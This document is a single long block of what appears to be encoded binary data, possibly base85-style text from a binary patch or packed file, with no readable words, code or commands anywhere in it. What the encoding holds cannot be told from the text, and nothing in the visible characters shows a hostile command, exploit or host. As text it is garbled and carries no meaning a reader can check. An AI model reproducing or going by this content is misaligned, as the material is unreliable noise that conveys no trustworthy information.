zao)WUhFuh^*m2RWw|kOoTUI8WM`LV_nAJQsDadDZ<>{*4Bps100Hfu!hhW{1%#%uK zM?1jD&|3I-xn)@UZ7!ww`|1Opy}}%GAic5V--gJI(bs(2WD*;p*_&qnwe2!!=NE2! zQfn*v#}B_o_{Um-F>)#=3_dg;wrr{+V6tZK#c&>YkhK(o2x{4zghkSPgxUE>2I-%* zjmslE83*|HvY-ohME7P7VID~!@wsqwP4fC>x00J{^jsL_#8K;U1k=@LT7Qpt(N}%0ELyhGNRQ zfrW9>tZa_pcU+Gi{aU68JTnCBTE=PKi2sIq;o#wtW~#&VO_iS*w9)EBfD#P5>9{ zq{Yw)FLeXc+pxBR?TRRfzS=mU=;y{sQ*XRzOzyA|P~BhN#gfm;K-RhSsfSyPk2aZY zTR&&u&~i5!W@5qQiu=}(uhW$8JW0p$bqVFaOs2&9%18YRb0_hY*{&yv{ogQF^%)S0Y^@o$bbe0t>7kX&J91J%e=|6T? zfbxBCy#D2gU((8IYH()yJR$NOTAFJ};jjPp$LmX_jCy)M>m;d4T>N1K-MYtI%Ikd< zR;aU;$bt5GXLM6*Snb~c{eSV!WJbBcLb?u7MByIn7(otfQ&Tt{s9w*2TcN-Iivhpw!Y)f)VNfb-(Q%~%k|W06>!O?tCz zpLoNjmy-{ynszsnH^0jK$0dZxv~wZv(wR+#Kv7hv*;pkXc%i#zGUWdX@k?*BXs9>0 zXtwk_90!5ya4G-oVhWRLj~l?j*@*u=mgL{}`EpTKzSsfKP7>~>8U_z(+r%hqMJte& zsNs3}tV+^wlet$eI%3bXLbt`-TCz$ZmaU$pBxz%{C3uH*V(TZGtBt?+VXe0Vq28tf zv(?9c=N6xR=|B6NWU1-8OVg*-3w-2j5Mw*E^EsGx_*E;nQ&Csfe^!=aG=*&eQ;T?z zG9l!YD(5-=fcMQvVeGnIEXjrK&vkv0N-X0*CbwUVGx$LHmcl{zd~=81j9KMB;Dtk- zlz@|iaLz1KM3h;?4Zm>9s^w1dINxL(H1xgwZDxx5Ah;C~7It_X)AamDXjG*erC5bs!$#)F0tdj~ryrxR~6 zr>yh7qE(luso>MUy=*~sb@5wKOAAb-&6STjm-%hWBU?_OXm#!!xA?xn@=W6_hE@L& z2y7Z?l`D7YH)aBz8P(rAUzc9dH&|9{gULG34*B*etHs8q2QT!j|ADju0GzdN5~L}oW(n4h{M~;eICNJB=}=kezTOb#P~`_8g>x1 zq_|dIWH=vE(3k3-&+@_==Ih_5PU1m$iR> zydGQ&BBm!55C1^x^b3taL#xIljOX!U!v5j3SNi$sagc(Mav@|Yh7n8Cl+Gf4M11Ud zWnrB9y27oOFyhnfU?@v-rCrK_8ITpIeq$!ymeqLn{W9DiU{@Jauz$ge9w&z9r}(Sl zojg5l|y7S=%1SA z3!WTDlY{p_c9PSal;m(V)4N@vM30FFtKOa-v-dS=P1!LbaP5tic-Lx|&}l!mIjwSB zB>bkQ`AJR3Q(S$z?Fo~JB3>f>d7jXBc^^?$gPD)RbbaxC+x2Xdv--2yNc7-V-`<={ z5`p2alcDhuyN5WQ5RK90PKoiZPK{_>Ukhb%D3Sa-u5v1d8Q>kX$>?g209#)%uEELt zsILaLH&x0Zw{QC9Z^;$d z!1g&mX}xY4U3WbImSZ#-`S z^4p`46thkj%k5d`Ncj+%_KCd^rbiCPFek{w0nYF4OH$SjSQsIl;pObb*Wpw1Do^=X zTn$F#@cvyUm+m(S%S%?Zmtj2jsvB^H*Q*9kEr5Yl>2ixOHnA%UFBS#_^f(*bf!ErT z!-WOTU$lX~=Y%qe(Ew`+0r`5+rriW-uT6hTiSga*i8aoh!U24c;)@#V&ax&%*8QI@ z9w5Akm!H4S_|JlLw}FHHu{`sk&cUT$cj-vuim#7ZRw!L{K2N1Byy_xab(@gA?^ z=&V&V~!09C3Y;ITciX)1^X8e=bC9zSX_Mt}~ZJ5mexrd#kS7WGu8P1Dc|EWlk zKs17n!!Cv3ZdXzk-6L?>HC$R#rbR^~R*(xA+$Y zmmrbIInM}bDvVANr66H+mR`N;&DPx56Sj^i^{8u0eGtSQRUsBr0lx0kRTasi_NzseA$#J$W%t58vwr$t*TlGGSJg_`;J4e@`s>f zx~T8&|E&(Z89v9U^#ysvQ&>TGG2#QdHsz59gKPu_x#$R7&$4^5EW7VZZBd3I{g1lS z7K|!}X^eYf75%EK&`6{jyASMuS=xeLji?)#W7Mxhfj`7cKR7#-$9&av4nA0<53=+S zN?*!^knp-f?#ceU^(xSUeRCej4okK0F0u)*9#3eJWjqG9rv~u4lR8Q|vgV~h=cm7P z1GFZA>g3{pSu%cTy%=$&o<}(3p8qo9Y|+C10?nqy@yNj@%%j@9N^(@xNxxqWyZDt& z=kcXn(A7VQ*8iN_Cj`>KcT6uhIwq#NxAaiH+u8BA^c1EPv5Aw_0`HxsK(`OKjWgJv zKNra2n;9umxYw*n_F<^GoH=~Px3zb4R!aKs>fiJh-tp+0n{5r(D~#Q@YbRo6&5KsU zG&cCJ)Ok^{v-lkj#ARK-SLj-g2qP$b$PVB{YrJ>x04Mj65e$g*>bo@5%*y?ZsTZ5# zOC$-0-eIRik=(+YLacalPGTF5JAqRLE^)xmWZ&YrNt#q`4`ggWoj=Dkv(*83yOmhjX}!9;pKi<{SN}EY3Gds#l$bbnl!47DB{qJd z<&~NA>MzcAy(Mj|MOBvjk5&5X(aocn(^$7yf(FCk!fN=kOaB>~0K$@Vd-I$5R*Yl^ z!bV(P3(|jEH{Wz|A5wJQt9|^ML7B*^Y;%zOG2$N!Z0{AwPMXS10(n5*OO{vMlCghti z`}tX?I%f)z)|>W)^^0yEeZ6TMW?~>vpD*GiR~|rlN67JV=#N-0UiT|}o7&?4pOtV$ z2$Z!!rlw_jvoyb>QPm&w-4Dc+jV8%CWht;Q95PB~ljn~z(6d-B?iHJjcL1?{okRp(tV!FGw*y)mz-^LIK=h%~QE3_rtmwqwSHjL+F%> z_vXCuySIOFNdOUhXCUaCBO(4xPaktjnN7(%Yl2*KL_%bVg_$6CToU^?smxK6xLj!c z%~IRIC9CrjzP;cD@mtBDcE@?0ZNU2S+6k=L{|A4R%_8PwEx?Pk0@zA;W|i!uuBl04 zGZCpfU=#N-XK?QVG-fq8JAGtnRWxb2^$(8)B1nJS`5!HzI}*Ar!su8FE9AUfu@)Uu2v6D&5~smq#d^<6_kYIYsPm6k@&)zT;004jNi(ND#hw!~QSk{SRn` z5-$M5Ic0G*(dr18|Dh{9&Li1dfJ9HiBDo~NJoQOf{>}&h^nxheoHVn&S>~_Hcv{)% z=QD_^)g7`CP>&);Jy{dgr3W1eCt4t}$JMP?bAGHA(r}KG@c-ml@bCM`#|Yi4Ez`LYocUaaVQSk5R~l|W+K!~(1t%RS z!n47Lbi>f5BF~a+<+l)YgaG;5N4xd#-{kutU(LkPZ9jyw%|^XW**ZiKCn&B9v;Q}1 z$Pv_Kdfu^{twd!>@!pM8DrsS6Z?ZcqE%i^wQ-E&Ecws-oT5^qh<$&gMU)#Kk60{w9 z^6B%x+hcZ;5{GX-_*4Dp<3P0@eM4$b|Ffzow`MZ5ud33e^{M3h)^o1oS@Um21>V0c z92_bOim%QVhvfoT_U>Z0Mw;<(pwYtWr0KYorrSXA>Sa?}^Y_-kwUv34KeA12@O#PaJuCfbE<7{@%~AIN>Ry@q#HZz{x+#|Mzi7S}Envy1 zdQLVi`x#AG^8tIl+^plpSQrh)(=l1jR$99dt+JGA)yv&o?o-|$*6XRUR7^N_0u%YY zTUl6H`}H2D^zc#^>gIy>O$s~oHo}fCqi|Pdg>@GdViofzk<4SB&T6)L< zLbyfgIfT)VB;KYcG1S<2y$txv3oFTExUwq@=1h&A4t_EnKz|$Gjs5bYaCls|*c^Cm zA?>F$64y{uTxtDi(6BX-$JAiJTQ?VNLr4DCG7;jFG`)Idok4h*hUDny(jAPrxA^k! ztFR3Otvx4yPh0#GifJ`HPZh7LnvDLJqTLK|3w_zJgphTej??0d07^zzeY8YUy{(JL zCF{-l%Zu5@m$vzoe^W1EiI)HFyse+kyK(BnegDenARV9OI=ubdae16Rw%F#t_m_G6 zoY7uwJUDc0U=KMSVIJj)ktv@z4?Al@77cG$H6$;9k4NWIAGx`}1f7g*&)cwb&9eXI zdh1|JeF#0mF12q<1nA7B0|N<2xi~G71KMOy7azhtK;_E~T*B#6LaWi~nJ> znkRdaJ+-EI)^6hCjE7Ci9^eT-o(K;&%zY?pJXp zfPS;78G6VQDt1pFTiX5Ex|aXu#5qz@ZCT24EU$ZgKLGczuNlqRdg<#vk+*1|_a@v| zmfO>JG}gp>l%`m-=ls0a{AcY9M=>Qw_mp#nW9j34ow(%>77e>LPa3+QBY7t6G(>)k zj&PsXkXOb*YnXl&oYvri$l5+>JIpWVOw2h!*f$%*&s5Ksde7wdM@F znBPa5NEPH437>Dgw#8r1A&xQ8p)SxqH`HkM`tCV9R}_}d^kP+XL^Bt*I3|BjtO~m1 zpTiZbUC!twe7x*ILc=GsX}OG_8=nI(W`YZDvL@gNTFx0=Pku0;DWsfdS{!wP6e!1> zch|^1Y}$l-OM6}IC~(@Za{#}x^EW-wdl`7}O)2|FWIogA>1w zF6dfQ{s^I|ekyXRhK12FU2UFbLvS1OoH{m^E@x(}W531pO18C30U6i(Y+|2dJ)7}4H$gEX7c&-Ph?_+gPQD{gA7&$}g?2i|;oNbdk-4yL*^-mKR=*nzc% z`_2upMenGo2tJ#k`+X4ZfUh{=hooPXdHejJxX}ATK2Y=CTZ$zu$8GYq$UGN5b0|fI zU2Lk?)b{XcxE1&2_Vx-H10NWg>b=(U*686|P~S-C#U;(m09{6#F4)>j{_dDv;c07T zB~sV@f_mcH9b{twnwda=>eK#G#G>2ijbLyW@R55Mh@*j>KroIS6%2bqqw=H^l2@wq z9{1FGKt!bAgIT$X`m7IfT;KB-J!&3YPuJ}2poWZVd~dsu-oyzdrYG@h zNkz%>IrarU_I-$=Og{lUT~^;D({zjD%Z@V+Q4LUy@jk>#EA6QUnG8gIB~cPKe%7}z zUYpoAzPq>#sVrc;pu!7O?)d1?@!7kEC+hv1xMkhgerQru`T(;m8(mq}5jDOv0-9i^ z`WPH}jmt!_)G`nb;25gsbqo8IDHevW@~v%tsM)QVh!{M%9EJQ>9oDA?j?&;o%6fcv z3MXu@=1d1&TF(K7TcsK`GCSW7M}#@cHYl4ZyTNKOFr}u^dh z@(k$`!Z!ej0}Yv&UvlJrPOYpa7k}04$3m4=)1uoro&6n720P$6_l$W`vAq>mMt26O zX{EG`_IUe;AyBDTD#Z4k>fLpVGAVCsmwMPX@PMujnQk(( zm~3yB?Qb0%NCAD)`Nnl&yG^*hFA2Mp*ZsoE8$Q#KR6I@$TYT%bN9T#EUWm_#*IC4v zBF9@>{N{5XQM{8?1UbYrMnBE#6uuu(rWr9|#L@xOco4mb=fGN<+K$)^vYIVjbFP~j z+~8QQ>-i`)hgVwz-Jin8K$tVMx(qRs4T&t$!pSCCrH82uPXXR{ZK~5~P0GUQ3hmBb z33Ag8IiDA&2mF4HJlhy`Fgmr;qf>iPkkjR<$b5MzneZTpdcx6p;hyuYym7zs z-~RQn?wPI&XUf^!MBFMM$7hKfjicPj{j8sInArR;1fWm~Z$z-ABJ-aq=nPeP=Ua=z zEsvp&%a;Pk>Umk!)BHZpHD2;E&#$H-g>tn6|7;B%_5ce_gk7PtcpG^|@-fXdTUH>a zuTR0RJepnyJhz2Y z$?#k~ek&j$d{)0*tvMSG@upGpyxFe?Lb!V(XJ(oyQk1u&3II5>Noh|bf%P(T-n^Ii z4F{`pXXkINSe%5Yz3G;FvKUPwLss zgq7z$`H8z7yPWK@~i?>;E8-d9^&rfuzlI(BJO6E~#MEQrw!HakH9 z?K~9vJ-M6gMas=lR)@#DdOz%B*B1L{VjXhLX2MJTq!?y!9(5<|to%$%!{umpRwTuW zR;)u|vuW^ncexe8L?P`?U{R5$j4&d!(&{<9oPM~I6T!9y@0y$l_KW_@ZV@^uHw$aY zdb(dPQQV`ikPv@TjP!1CVc6xr@jM$bN!zYE8ijg4M}6@;5y1*KywuW?PAS#>^Ig;N zk3oB%Z}s!$-c#@)vqxp~Nf$NfdUzNrzs+%jwkBBeR4K%FTgP0?p6$0eEqmO*jC?>- zVNS_sCA{r5Ugt7M9-(W|`OErwULM+2EVbXZ0(ZOT?J2!&*`?OjxOr+3wgDH^8N{8J zr=o)T(~SlGfzKefBZ7Vvn}872aR;IpTn^{ELLAC+gVwtSQk$GB;&KXyM4Mj62xI7c zVPB@=@*XztExgXkXcgd_))=hXdkAdfGcMA;-DGCk$1Wr_{+aiK>5}X`_o+8+eo`W7 zmxurBsF@8PA4;Wex^D4Wg1418E0->(mv9hw0Ts-~wE)civjBXw-Y_w|r&wcJ;Y7-p zIGZN3?@-qJpQ@*`{GX;(h?i+5)>~z=)>9SFP*imWJ8zU;VOlyOo?fJKCyd zB+`<<3FX&4&mejt#?F6L0PjE;jh)+4JC0cdj6uZk$_PzLq`{{C`z!#H+!O5Kc<`#s z`Ro$?@nKtICCUr&Di#YHBUabbeGo2<=A@^QU1mHX-9vDBn)3deN;0$2BqkoCQ6`Vw z%&{zaR-NblF-gHw#%MAV#`8^mxuxX#p_9#?M*w^e(A9GoNu%jOUJNNq>QRNVGpv)2 z#>eO-ka;~r)>3VwDc%)JTA!VrrzkcmTc$7c#F$Z+`1h(gO0BAa7!&9hV~@s( z;gq!RG6IBYQ)R5u%S|x}-2TWArGMuWZl={pOT<%3k4&l1C_R$w=VLZCn0?3o&8_eq zLHU}Z?rIVxHtFYbZBZ@9*v$$Cwi4Fv^gD4Cq?lgFUy>;^y1FZy>Q$xfHejoP`>y4k ztR&4w*UM(2uQr0lIQzJa1{y|xD&e89xItYm#nwC)Y5*z5&L5YVK4EBQxjlaLR1O8RshE26QS93k?bsxrzQUWT= znG=j%`@+49P}>sfIR#P#I5Ww1_f$y_@axO?OH?`e(Z-fY_C#OgNuMEN7r^ z#vMPi@e_zY5(k4ehGE&!Hz^>@>LRFjPF}lWYYD{Aw;={Qq%vl~HkI-8NXT-~??vxCD16xVuAecXy`~g1fuB6WoHky9IZ5 zd(Fr&-w*t%w53C1rvI<@*g{np0(TE5bVp)F7#%@y86 zqKIi#_bB5yLu>@9h!{;Spf{C7}N}^U~V?W#?N9y}~h)AYUe+Mc%OKZA>V8_-JX6aX!v}abc z&Vuv?;;}sSMwR;-y6%SvAGgM$SBv&0rQkzz35ruZs2pe~k??>Svm<)e^<{!bCX;5S zHHk#3>=9#OaI)6v#Y75OvCI|7oly4X{OY}N1B4j`^+ zeYCwY?U7=|`6UYI!sh9-Al(ZKgZF+49Rz+D&ns!FiW58P6WR=NpxLLrw_)cK&qRc& z?b9=jSWx@@k-9tU62Clsi(HEDcG;m(M#$sf*cIDrBL!X-P85f;yaC#j{U~3o9fDdLGV3E7~J*4{!XMOdd!w+4NM652He>VnXJf z*5Uvff~m$2e}RWh;l4h$Kg41|2#cfkrF;C2hEQyD+3ncYrUCr<9g9ai@8o*Mc|j;2 zX-P=NV^)x<5>bEnMPzO{Y999uyreGqoaxWg3P?Y^)eOTA-V4uVSZ>;L*r zpxgWf%e+72f2>f(30;c{VB(lP6;PARV;nAF18+Nw7_E0f)WYH1`q(u#&QM|OUu#o! zJe;sd;JhWBzMx&~@Lmu*_Jh$=DpZQKR`5IPeReX;ec`tHIaN$*iy259@K)}BD9nB< zKYU?P`kstwhIGfp$AyncIoLXK4*}{|DO8+@&6w3Ijdji!j#oD8QojmBHAQ-%>=<{{ zbde`jI>dZ$rq0b?rsBLu8VRt+nMb-YINsSxU6szn3gcgC@Ra>jmxi;}qXya=uLew^ z;H!gVOq7I_63P}NH>M8iMfYFhYjby*oNhlMuVU`BO?rUDDvr~o=FR_r3jNZhJFcdp zvn2MmgmGU`e{(N;u*Tpoa4rovOEcjCO0x~es=A`rQpP9d981d$KQ|?uvkC9-d~=EU zz2cI(z`1fDx;WE^@}%@+!u7&B0w~E@S5+}rMw*LtqNeY3qwmWH)Q{VZJDQ*xN|j^O zn~}no3F$BW)()zSQJvkmylpKROV}cZP4pOk+6_N*?9KafTW{z4H=B%qjOgp@#exi` zD8PNxsjP|A79;s;X5)Z$ui%7zQnvZ27|-Qw@V8|3qS6$LJ*eIdMQl5iTabOS0M?Gz z3GTw>z)@^+Y0%oDuJ;p;gt22abPjzXL6R9&+OHM*@Tx8(L4r-ThPBH(qUUOCU-so* zo;W9$gsLZCCC0b4EMbU_S(?4%8 zgHzCDGg?7kFndk09T%8Qf*;8r%J2BvoC1$X)5b@85?*ip6Hl+^_NN^|C{t(HU%d>R zBwv?Ld+f{?%EML9Zm(&CzjrNv~KdS8#89=|vMp ztDcaLD~qcqnl9Y0e;6S@3G(`>GKm)H zB8cEWehGWmSHGVDg8!)fpSgiuWu*-}Qq-y3r0N_AyyZ3)7Q!B~7X>*ZU(kl0c|vDyFw`mP)pl%RUbJ1UpK*T zCEiyzeJzwdw={ffEls#juc1{Kr({F3!P<%@z>N0a*f?5#W3QBJZhilw2s zav;%^94%uyc@~cGy*Z{ywX$ z(OhS&^7r}u>zT^kLVDgQm{KGdlsyiKK>UyV`PRkCw17?Q&#|357+!wwb&flEPW&^K z1Mx=N&RCu7=w=03+k&O;|MeIhnZVeDJ00(it(#w8QnMshJO$ML=E%J51VjNN2V=tK zWRP1=FbL}Tpj_0)LUO{?9*3F#cFEutRQ0+(v@?;pBTfDz26{KsaBX$ z##H|Ezo1P?bhNj3(iOuMWYtdC6~>WmdwlYHY;y_=O+{UM^%jq?G*{2jNq!}nx{+6W z(LSLbl9qi}p}5nYp1!Y;jVb(bVUN-wSNR@?s=v;*@f4iz(X276oxJuaaZr>fTi{2vr%~JQ zr(q7ck<i@5FW!SfjJz~Cvahln205NH`=SF!oGseA@#k#M za^+em4Me4n^OTagwi5R-cXGEJit&AhUEEV`u^075c|Jo+DY1q5Jg}pjA@mm|ShQj$ zfSJlIJtxFit4T0M5~_gfWa(I8czg*gW}TP0BjA<|%ho|)I`gDbcpBy3hcJr&BF_d{ zh7;}B9zZoaD1|yN4Eb_$`ZCJ?em;5>6ju?s&pL3@f)xx@mTLuh^ESBK3_`-M?S7CC zLdd2Xbo(M>IQF&=Va@G}l0Qh66qvQaqcP&GBP@bd;LGXYjXUjs)}$-V)~bT61> zXh#hZ?7q+^6Kb={yFN^Gns!OttEOSv4k&jn`7tj)hh?%l9xQgH%A&KK(DevVG zWFQ=s%DY*&D;EkxoYQPanK>+bMBJ+MsV^C|TU{3AKT@|=q`Jf%=u{Guloll4sLbJi zw-Y%Qz?!KoO1h-i@w5w&;-*-=Z$H)Ko0k8^w3U&sYX+M7ucA)@;V*J;k=a(f1 zIWLyu>6q-c?yULTp^5_l(AX;hf|uj>_|&QYN~zbX+ZhRxD8McdJE%iUD1GXkQXH9R zA7`GVN`J){q1e%%BIQ!_FCRwdEMq?|Ztzf|urj&V%8ZuPt7fPIOV}3FF%~F3?+pr& ze-d&oZpEx!<(j_HjNYyb;E~siD{fA{sW0FmA@46BqeBUl_Yx6BsK)c1+YXv}9Jq7v z7tznI4ZmA{{gEoiR%_7%=b+9=9%-?LZ42pozI=0Svt&<;}Bs<=92XRp=d;U#v3@%IvxjGGo6w zFWT+*lr9ZYa{T`e>~al|T|vq}gm<}3^({0@!ntFIt@o7URxPYdFAr~a%pAL0F3+MO zJaZ*e-wU|@@Tkrhq#_~MVE))p36Y+aqklizKU_Q)MwMIM7AsFSyZRxiSPGv*8H4-W z2o3J$8SXS(?L1mneTWlakv{H*Kj9thDFUKXFD%U4mwn}Rw(Xe+F1E}?{wu&RGlOwe z5NQbvu=RbO3Aqg3ck32cdvN}Izc3_yk)vG3_Q)f>R6s|d{~qkNR9o7XQoM7SX%0tm6u>SHOjplHjT+c$5EKQ7IPn%Y|mI^oZ?ArRFh!|>}I1wa_RWC z+H<_BC>=4A-XpNL*F0Vk;jq=GmX4*wCI)dyWq;fC{&>a>lVf;rF((I|nz^>$XL}eB zTUv2g`~70Sg7?!Uh|xRK-j9e@4}Eyipe0`v%7gZ2YTzsh?#+_Nsx4iViI&Ykxj1Yy zj@NqP|8$`pD!m8lSbf47GQ5e$@K`O*pym4FY@Hy)_SCTKHXCaV-Ds^DL*r9GG1k^5 zM0RBpmr>!WT91TH-a5zkneP$)`cv_I=@h+=_ubR>??-$|x)eg)c&aquGUp!q7O^?d z*C(QTwoEh6X07dbT#iq8*gki{18~q+j&A@P|EtwTe=sFyO7q*{d4oOG8XzqkSoEjw zYew-CFYs1P_ppjYPks>7tcq}lX^K{Gut{4R*WBgkaHGKK%OVnt3%)jsLJK~MTtE{} zUews?!Fx6uYkjZe!{PL6{ZO?h?LB(B^Syqf;Wh#zK@8Pf{>;qkXO=N3pUHLYg?9hB z=t@Q_Pd>IcSm5xl3@(!u+*p`&rHcar%js;tf5;gyTp1{FXOx6G#57|p@t8-xTrbXB z`xPjqJxxW>Rv=90RZRHSlCNv~|YSFc^4$xE0XQmaH?8jJY+yBpWJ% zBOyq#op~-hm<_$o@%7hwjUO6HI{D>n|I?TZy$w;XcT%uVA6vhLj$828*zSZMyC(a? zVxo7kB|cq&L(}e-X4Ph9;vQ}?;5-5Ey0Y|RGMJKs64sPS668|{{tg*AFp2Xdfh7An zt-ZgaqW+dmikul6Q45m zm+gChK)uc9|FrDx7RYau3$j#=ETnhubudTKLdv6{G0ga0=WC+^2C1eTs`RI#ES#sd^~``yDjLHIDFx(`3a=q~;>sse9Smd@)6I|_n4>7!xE z3Vp*@hSg1aBDj-@Y#b`bvJ5181!Ha3{9qL6O2qCYlfk5-LFJPKzF15$Da?ukskAZV zHbn3eme$-$LNc1BFBq@(Dz%8MQjgJE_T7#a-BHDSIClM$NpZZ=bh@73+cdKc1J={f z$yad$1@yiMiYn-5$P zk#`N-!RXTBl`k!>^j80C#`2Bq=%+2v5ll?PTvR5!%OdupwvM<=`Qd7zJCG`ATg?D8 z|M&FHr`z~Js2LJXr(?%h>onx1^52B%w@b*7e+7>lf1bN#tKI)%7A9|h;+t;J7NBWV zbj7(N!{!I~ACv+_fb;XsAVkm%tBIVCjJE|;q8l%UcX`VeZ*crSBgjGhmQROu+F37X z!j*WBNai`ffeNrQou-y*{?8>dV_*Yw5H_?-l|V9uRTypO{J^tXZ7)mUU=96$E_tN{ zUKJE$`4r7MgDAwDy6O9a`S&*iDxDGxtEFHoD6<(^wuWxc`f^vooMmE;c6y;5s7A#K zO;RLXW>%p#1x810B2eO|wy4|^eSn|r^62v<^8U1@0pN2b&r=&@iSf^3%gtR|`Gqq<6DGcSmXes@y{{S2O+GzZ) z(dXF99)PDph)KJ$G9G_WIH%TLHf4QzOn2}23WQngg9>Kxp_52wnu!_L8ELWr6<~ahj zB)^X2a~DuGcX})*?+|rkU(`ta$B?2QC#h{G6lVX$_7GE<5WeBhD1H)@4kl-*kY3}Q z*kviRxo`TGfmu-+@%o3(+Q{Y>Kg5!zeC2`5D8Rt3D)OP>qRTDoQ;yO$o$&CM%F8sN zDvff!#Zh*ki3%^jpZxm~zE@97xa)7j*g%H@=6oiaQxS3u5SOkA_(8ct-Sw%6FBwm! zyZ(4dvD|QuG|g=%=>kNG5c$|4?s~tSU|=T8a~(UJ%rex^ebG;1zY&D#oF;%b{o!$U zIEln!uAJrZ)aUh)v9B;dITr(|(Q^}bZ7-fv5kZgm?bRL;gV&gh#e=w-Y%^}YQ@-5& zwj^(ZbD~)vNj_Mq>CLn?Wfj`|Kolh^_I|H>8rJI>+~8OXCL{DS1qGU*c=}}4T-1B{ zm~jfoNQ>SGj(0D-7R3Ri4UI2q+Ru$dO%1^&hIcaE%}?1PL-660)nboD2^{6H$GW&C zuG@#{tH#!&h~dOm{T9Vu*ZMaXVA#ct(L|*i$YHhkRQ{E>dsFr^lgA$O)&7d6vG)a< zws#7i-7l02kaUB{wJSN1RDi+x29nRuA*=mRxY-Kb&wT&~sa*4|{wVu{q5|h&^MgMr z(1rZ#kwS=3DK>45!)|9FHWXoZ*xSK%Lj0X2(IY6o&K{`wR4NT58+85{F?rCiZ;L|@ zhO;5oYd5|*Zq~sK9CQFoF0v{kVi)X}s17pPo!Jk~wRAU^v_^Hhgtd-NLMS$XE8N1p8$4xu z&=&IJoUh;ck@rNAVJ$O|OW5Pg5SYZ9#3X{^ioVFKZY?|9C?f3q>GhaXjd1#6= zhG79KTsW9BJAzRT;^Jg70625oe;ffI+sp}y8=dNe;B&*tfmz&~LwxQ|X4N%L(o0n+ zoFoY`DR!dcgqk*2Z!A?rKei`D>kG#?+F;#ZKVSLHe8+hnh);qrkMFt;Ca}9ya35ad zLLc3+Zh9A)NnJipM6@!_A=0-1gby;xJguFQVIum%OHfS_P+9c)a{9{p8`K4j2*qKc zvRA-&-y`C<--?0418JzVaVa-cK)Vw~gg3j`M*5pU=o83P2kLEn&G zlUfO^ti(dE&Q)b;lXWqT=Kf{D;P5@tkf1n07(G?$s4Zg8$4h?{7`%<2&-evn>1bD~eZufhleCB`%+fRgMXrmw+t;&=gu#`aE zS256m@3(Iwz?5kbq@{am&3D{8V1;;AbwXDO!~U1SfaWDlP5ZzuaVoE7V*#g(oQH2Bx(qX*#ytLW#&@-G1sG?2}AszaGRkkdo3M zF%*umiCnwaCN15!>l{kQE~>v0@hT&d_NeW4ztbKAD{Hb)p5}^|-AGA|yH7^5pB?y1 zoHHzS=qTeKHKB=DBGL+>mH;SNysD%ZIT zJXxim^euRPy|H;UF1{fFx1})G=0%cuC+PE(yG7qifCwuXlQ}i#hfE$wrxy_53t~ZZ ze65ARdo^@L>iYiF;$L|gF?wIA*PUJPU>oeoV@hHv9*+Lik+gQMrVj=#6(bhN6c80) zUJrr9EeFyWi4#Ky(A$7NJi$n_xKsQwn-(TQXe9%RwOG~Drm8VF{=RNL5Y8)7iKsX0 zA8jc~5S?Mkv?B*lt}-ap2sF>5p||4%(2NejIQ_0ODHX(ygn9Z_a~}(-@gt3&Q*CD; zvJuf6w8hrD)HA5zZe}yf4I+2~H5`k2x(R@r0EL8M}?_QIySRRMe!;t3q7pwdEsFh?#}`6_o5?^NNysFYLu;Brz;2;b#$=b(tdolw zsH+S+z%&SM)VnZjs!lD3*J+|aOwSTqab4%ZJWz5up$ZJKa$L>4#v83YSn8|{pVEW1 z^nq2i>J{Yg(E=G}9#Bks!bf2^OOLuiNOCE}V(gCemcW z5>^KK{+=~BmQe?s%m?`c>xEwt=) zS~&um_Tei3pC$%9_()zuSKdzqvU+jNErV2?Qak2^f58iXOosTL!=BMK2$mqy)$TXr zI?m~PM}lSSpW5}$NyGkUNzkCAUM$@1cZ!ci*uKh+JWBH{;MfJDwV6u~_6!-n_1>XgBbWO1Wa-0FCn!;{Yu>f=fv*Il)X?y*&T;7v@ z9BFSl4O78rOmpjQ<%2s1=eu2K5{xw6$jOc`#8NOuQu&hYFHbPu#uQ2-JoF$*K+Mko z1lU1<*YjYecFFcbj-=6n-aDw#u1(qJi6amsX0@hs&q@DpYs!>_{Ysk0iYG0{C%_iU z&MdB&mB9SbV_(QkdJZoDp*OE^&}>h^fh&JmHvB}bP=OS;c9YLK9K^l}V%#_VRgLYe z(LL&@Vd1 znkq;kjqMbU?K82CaoaN8rKci>m*@_lo<2mfc|TXe>gb_GI%VzSu!-x_zL7CfS}<>` z$I!5>{rz%zJ6tJ<=ldrM#TRl>G_!tS0`JGGSw_%zh1W-uh=E@fuOej6Yoa-=ZWXOV zWTLl|wcT_+%!_@V$9!9-J9C_1F2%>U6*`ndTihHYE-igJpVqifQ9$`_7_Q4VDeZcN zbt;-BkEG$J9Vu5t_co1nwqb6!QVYM)tUKs}_1r0?B}Vn6R3Ggkd{gx;Q5xgeREXFl z_cYfTgU=872hO;bDQrTFqHL&^%@4JpTzK$Ylt5VpAvIW$&%5Qrs>x|J_Zyk*e}9e) zeqYgvI4ZzwqFI}*L1w9K>A-UEdR`G8EsNjOfbM=B=lw`vc%$=h!NyF!992J888ED~ zx1uV;h_QhFg{VVqWS8nr~gA=Ufn?GsNZn0!U~%2R?lurg#kI6%JP*;p#*#uM@s zTzWB+PXaIt?iXaL@ru(bAi-@+;bccDdGbs$5==cHQZoBJKjF`_OoqpuE+cf(lj}=v z+l|214;tU!29=RQ-GW6xRvO(lEkxeCuZ=s&7UnxJH$UH-LjUPx{Z@ed!*<_(?~Z70 zcCEC%%hsv%-2EXs@V&cXAU^DHPy{D>sM=a32@Pl!b2{^z`KydStaOw3FjnXMxqTw< zCekjK7Qe%c} zYKwanzx`uE#e~S=+;__H$t4u33B+s4yBj4q?pL}NbK>n@z`Vsfy43eh^liFvQ<)CP zy&nz3CkzveTPY5%mz3kfXFZ!?K3)*i%LGY81nts`_F?WUfwSudUn;XSA`}-1@{m6V zXu0&TW2?%+7rgM@tU}9_7Z2WQ&!h!XyuP+ZzVn|HAp3Pj9ujRE1V0!FNje-V;5z&T zKrWCfev!TjgKEOd^d3cTRoY%&j1IAPBLL@ADil(ni*i4=6~Nsdd>pZqdf?4`1~LlpCqV?GouvODIosy`_e|G73-y1c9bkR~YWC9N} z`14F0CUeDa?lvQC*WQs5z5|2d&!mMBlcxx*g!D2$|FkWf(lJxO&b&}8p#X#7b!p<9 zpoo7nN`X|-`g4T$hz4PZSN?}bbc!bzJ#{e;#_F+&p7-~ox}!#Pe|O! zn2&V?2xQ2tV_QZj)2JI9W#0_lzzBGO_UjPyV1)*QmF9m3j_k`H>>ICxFhC9e5vEQn zRLB`1nWj&unyZ@TMD&Y&ulXWgSK-HGq*c_V2+B{(lOQjx*kB_L$m^@(W*Qdh-%=G(yVcJQiHxX5_V@%7Ra4{ACZL7+|I{ z07Ry$+ovGQ*Z60QJZ+}t&HzMbxY 